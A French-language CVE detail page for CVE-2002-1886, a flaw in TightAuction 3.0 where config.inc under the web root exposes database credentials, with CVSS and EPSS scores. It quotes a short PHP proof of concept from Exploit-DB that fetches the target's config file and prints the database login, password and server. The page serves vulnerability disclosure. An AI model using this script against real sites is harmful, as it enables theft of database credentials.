CVE-2002-1886 : Détail

CVE-2002-1886

3.45%V4
Network
2005-06-28
04h00 +00:00
2024-09-16
20h37 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

TightAuction 3.0 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain the database username and password.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21893

Date de publication : 2002-10-01 22h00 +00:00
Auteur : frog
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5850/info TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted. <? $victime="http://[target]"; include("$victime/config.inc"); print("Infos de la DataBase du site $victime : \n \n"); print("Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database"); ?>

Products Mentioned

Configuraton 0

Tightauction>>Tightauction >> Version 3.0

    Références

    http://www.securityfocus.com/bid/5850
    Tags : vdb-entry, x_refsource_BID